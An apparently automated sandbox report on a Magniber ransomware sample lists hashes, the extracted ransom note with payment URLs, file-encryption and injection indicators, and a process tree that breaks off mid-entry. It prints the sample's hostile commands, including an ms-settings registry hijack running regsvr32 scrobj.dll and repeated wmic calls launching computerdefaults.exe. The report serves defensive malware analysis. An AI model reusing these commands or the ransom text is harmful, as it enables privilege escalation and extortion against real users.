magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
149s
max time network
124s
platform
windows10_x64
resource
win10-en-20211014
submitted
18/11/2021, 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://ca4048203a7ca27044eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://ca4048203a7ca27044eltalkfzj.jobsbig.cam/eltalkfzj http://ca4048203a7ca27044eltalkfzj.boxgas.icu/eltalkfzj http://ca4048203a7ca27044eltalkfzj.sixsees.club/eltalkfzj http://ca4048203a7ca27044eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://ca4048203a7ca27044eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://ca4048203a7ca27044eltalkfzj.jobsbig.cam/eltalkfzj

http://ca4048203a7ca27044eltalkfzj.boxgas.icu/eltalkfzj

http://ca4048203a7ca27044eltalkfzj.sixsees.club/eltalkfzj

http://ca4048203a7ca27044eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4272	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4444	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4616	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4764	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	2380	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	2380	cmd.exe	93

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SendRevoke.png => C:\Users\Admin\Pictures\SendRevoke.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\StartMerge.crw => C:\Users\Admin\Pictures\StartMerge.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\GrantUndo.tif => C:\Users\Admin\Pictures\GrantUndo.tif.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\PublishConvertFrom.png => C:\Users\Admin\Pictures\PublishConvertFrom.png.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\RedoUnpublish.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\RedoUnpublish.tiff => C:\Users\Admin\Pictures\RedoUnpublish.tiff.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 652 set thread context of 2316	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	15
PID 652 set thread context of 2324	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	14
PID 652 set thread context of 2452	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	37
PID 652 set thread context of 2792	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	20
PID 652 set thread context of 3424	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	24
PID 652 set thread context of 3696	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	34

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\win.ini	unregmp2.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1744	3696	WerFault.exe	34

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "12"	ie4uinit.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\ddeexec\topic	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\IconHandler	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tn3270	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp4\CLSID = "{cd3afa7c-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1430448594-2639229838-973813799-439329657-1197984847-4069167804-1277922394\DisplayName = "windows_ie_ac_001"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-aiff	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\ = "opennew"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\PreferExecuteOnMismatch = "1"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shellex\PropertySheetHandlers\{FBF23B40-E3F0-101B-8488-00AA003E56F8}	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.m4v	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-mpeg\Extension = ".mpeg"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp2\ = "WMP11.AssocFile.MP3"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.asx	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.m2t\OpenWithProgIds	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.m2v\OpenWithProgIds\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.mpe\OpenWithProgids\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.tts	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\http\URL Protocol	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open\CommandId = "IE.Protocol"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shell\open\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\ContextMenuHandlers	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\iexplore.exe	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.m3u\MPlayer2.BAK = "VLC.m3u"	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.mpeg\OpenWithProgids\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mailto\DefaultIcon\ = "%SystemRoot%\\system32\\url.dll,2"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp2\MPlayer2.BAK = "VLC.mp2"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.tts	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.mod	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-wav\Extension = ".wav"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\Shell\	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.asf\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.m2t	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.m2ts\OpenWithProgIds	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mka\MP2.Last = "Custom"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-flac	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.wm	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-ms-wmd	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/quicktime\Extension = ".mov"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.adt	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.flac\MPlayer2.BAK = "VLC.flac"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.m3u\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wmd\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-wpl	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKA	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-904"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\http\shell	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AudioCD\DefaultIcon\ = "%SystemRoot%\\system32\\shell32.dll,40"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\.avi\ = "WMP11.AssocFile.AVI"	unregmp2.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
60	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe
1744	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2792	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1744	WerFault.exe
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2612	WMIC.exe
Token: SeSecurityPrivilege	2612	WMIC.exe
Token: SeTakeOwnershipPrivilege	2612	WMIC.exe
Token: SeLoadDriverPrivilege	2612	WMIC.exe
Token: SeSystemProfilePrivilege	2612	WMIC.exe
Token: SeSystemtimePrivilege	2612	WMIC.exe
Token: SeProfSingleProcessPrivilege	2612	WMIC.exe
Token: SeIncBasePriorityPrivilege	2612	WMIC.exe
Token: SeCreatePagefilePrivilege	2612	WMIC.exe
Token: SeBackupPrivilege	2612	WMIC.exe
Token: SeRestorePrivilege	2612	WMIC.exe
Token: SeShutdownPrivilege	2612	WMIC.exe
Token: SeDebugPrivilege	2612	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2612	WMIC.exe
Token: SeRemoteShutdownPrivilege	2612	WMIC.exe
Token: SeUndockPrivilege	2612	WMIC.exe
Token: SeManageVolumePrivilege	2612	WMIC.exe
Token: 33	2612	WMIC.exe
Token: 34	2612	WMIC.exe
Token: 35	2612	WMIC.exe
Token: 36	2612	WMIC.exe
Token: SeShutdownPrivilege	2792	Explorer.EXE
Token: SeCreatePagefilePrivilege	2792	Explorer.EXE

Suspicious use of FindShellTrayWindow 47 IoCs

pid	Process
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2288	ComputerDefaults.exe
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE
2792	Explorer.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2792	Explorer.EXE
2792	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2792	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 60	2316	sihost.exe	70
PID 2316 wrote to memory of 60	2316	sihost.exe	70
PID 2316 wrote to memory of 3888	2316	sihost.exe	71
PID 2316 wrote to memory of 3888	2316	sihost.exe	71
PID 2316 wrote to memory of 1636	2316	sihost.exe	76
PID 2316 wrote to memory of 1636	2316	sihost.exe	76
PID 2316 wrote to memory of 2812	2316	sihost.exe	75
PID 2316 wrote to memory of 2812	2316	sihost.exe	75
PID 2452 wrote to memory of 4040	2452	taskhostw.exe	78
PID 2452 wrote to memory of 4040	2452	taskhostw.exe	78
PID 2812 wrote to memory of 2612	2812	cmd.exe	82
PID 2812 wrote to memory of 2612	2812	cmd.exe	82
PID 2452 wrote to memory of 2408	2452	taskhostw.exe	79
PID 2452 wrote to memory of 2408	2452	taskhostw.exe	79
PID 2792 wrote to memory of 3804	2792	Explorer.EXE	83
PID 2792 wrote to memory of 3804	2792	Explorer.EXE	83
PID 2792 wrote to memory of 3988	2792	Explorer.EXE	84
PID 2792 wrote to memory of 3988	2792	Explorer.EXE	84
PID 1636 wrote to memory of 2352	1636	cmd.exe	88
PID 1636 wrote to memory of 2352	1636	cmd.exe	88
PID 2408 wrote to memory of 1976	2408	cmd.exe	87
PID 2408 wrote to memory of 1976	2408	cmd.exe	87
PID 3424 wrote to memory of 2128	3424	RuntimeBroker.exe	89
PID 3424 wrote to memory of 2128	3424	RuntimeBroker.exe	89
PID 3424 wrote to memory of 3004	3424	RuntimeBroker.exe	90
PID 3424 wrote to memory of 3004	3424	RuntimeBroker.exe	90
PID 4040 wrote to memory of 3228	4040	cmd.exe	94
PID 4040 wrote to memory of 3228	4040	cmd.exe	94
PID 2324 wrote to memory of 3772	2324	svchost.exe	95
PID 2324 wrote to memory of 3772	2324	svchost.exe	95
PID 2324 wrote to memory of 3704	2324	svchost.exe	96
PID 2324 wrote to memory of 3704	2324	svchost.exe	96
PID 3988 wrote to memory of 956	3988	cmd.exe	99
PID 3988 wrote to memory of 956	3988	cmd.exe	99
PID 3804 wrote to memory of 1352	3804	cmd.exe	100
PID 3804 wrote to memory of 1352	3804	cmd.exe	100
PID 652 wrote to memory of 2196	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	101
PID 652 wrote to memory of 2196	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	101
PID 652 wrote to memory of 3708	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 652 wrote to memory of 3708	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 2128 wrote to memory of 2340	2128	cmd.exe	102
PID 2128 wrote to memory of 2340	2128	cmd.exe	102
PID 3004 wrote to memory of 2972	3004	cmd.exe	106
PID 3004 wrote to memory of 2972	3004	cmd.exe	106
PID 3704 wrote to memory of 3788	3704	cmd.exe	107
PID 3704 wrote to memory of 3788	3704	cmd.exe	107
PID 652 wrote to memory of 2952	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	108
PID 652 wrote to memory of 2952	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	108
PID 652 wrote to memory of 1612	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	109
PID 652 wrote to memory of 1612	652	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	109
PID 3772 wrote to memory of 3276	3772	cmd.exe	112
PID 3772 wrote to memory of 3276	3772	cmd.exe	112
PID 3708 wrote to memory of 900	3708	cmd.exe	113
PID 3708 wrote to memory of 900	3708	cmd.exe	113
PID 2196 wrote to memory of 4108	2196	cmd.exe	114
PID 2196 wrote to memory of 4108	2196	cmd.exe	114
PID 1612 wrote to memory of 4144	1612	cmd.exe	115
PID 1612 wrote to memory of 4144	1612	cmd.exe	115
PID 2952 wrote to memory of 4156	2952	cmd.exe	116
PID 2952 wrote to memory of 4156	2952	cmd.exe	116
PID 4280 wrote to memory of 4476	4280	cmd.exe	127
PID 4280 wrote to memory of 4476	4280	cmd.exe	127
PID 4292 wrote to memory of 4508	4292	cmd.exe	128
PID 4292 wrote to memory of 4508	4292	cmd.exe	128

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2324
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3276
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3788

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
PID:2316
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:60
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://ca4048203a7ca27044eltalkfzj.jobsbig.cam/eltalkfzj^&1^&40104399^&83^&335^&2215063"
  2⤵
  PID:3888
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\system32\wbem\WMIC.exe
